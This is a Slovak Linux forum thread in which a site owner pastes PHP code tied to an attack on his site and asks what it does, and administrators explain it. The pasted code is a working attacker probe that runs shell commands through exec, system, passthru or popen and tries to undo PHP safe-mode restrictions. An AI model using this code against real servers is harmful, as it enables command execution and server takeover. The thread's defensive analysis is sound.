Zákerný útok !.. o čo ide??

Sekcia: Programovanie 09.11.2009 | 19:26
Absolutne nespokojny   Návštevník
Zaznamenal som útok na moju stránku, ktorý smeruje na tento odkaz: odkaz na txt O čo ide v tomto kóde ?????????
--------------------------------------------- <html><head><title>/\/\/\ Response CMD /\/\/\</title></head><body bgcolor=DC143C>
<H1>Changing this CMD will result in corrupt scanning !</H1>
</html></head></body>
<?php
if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
echo("Safe Mode of this Server is : ");
echo("SafemodeOFF");
}
else{
ini_restore("safe_mode");
ini_restore("open_basedir");
if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
echo("Safe Mode of this Server is : ");
echo("SafemodeOFF");
}else{
echo("Safe Mode of this Server is : ");
echo("SafemodeON");
}
}
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}
}
return $res;
}
?>

Pre pridávanie komentárov sa musíte prihlásiť.

    • Re: Zákerný útok !.. o čo ide?? 09.11.2009 | 22:36
      Avatar bedňa LegacyIce-antiX  Administrátor
      Nechce sa mi to celé lúštiť, ale vyzerá to že ten človek sa pokúša vylistovať obsah tvojho webu aby napríklad zistil či tam, nemáš heslo do databázy a pod, nepoužívaš nähodou joomlu? Tá mala nejaký bug, treba upgrade.
      Táto správa neobsahuje vírus, pretože nepoužívam MS Windows. http://kernelultras.org
      • Re: Zákerný útok !.. o čo ide?? 10.11.2009 | 00:07
        Avatar Milan Dvorský debian,mint kde,android  Administrátor
        kod sa snazi zistit, na akom OS bezi server, nasledne zistuje gid, potom zistuje, ci je zapnuty safemode a skusa otvorit adresar. s tym, ze nasledne sa snazi skusit ten script, ci vie vykonat passthru, exec, system a pod, ktore vlastne vedia na unix based strojoch vykonat napriklad aj shellovy (v tomto pripade podstrceny) command, ktory by otvoril cestu utocnikovi na server. a plus to, co spominal bedna ...
        Moja strana | Blog
    • Re: Zákerný útok !.. o čo ide?? 10.11.2009 | 12:30
      Avatar dodoedo Fedora Linux  Používateľ
      Ahoj.

      Naštuduj si toto:
      http://www.theopensourcerer.com/2007/12/20/is-this-a-hackers-tool/
      G. Orwell: "Čím více se společnost vzdaluje od pravdy, tím více bude nenávidět ty, kteří ji říkají."
LinuxOS.sk © 2004-2024 | LinuxOS.sk - Team | ISSN 1337-7639 | Osobné údaje | Odber noviniek
Hosting sponzorovaný vpsFree.cz o.s.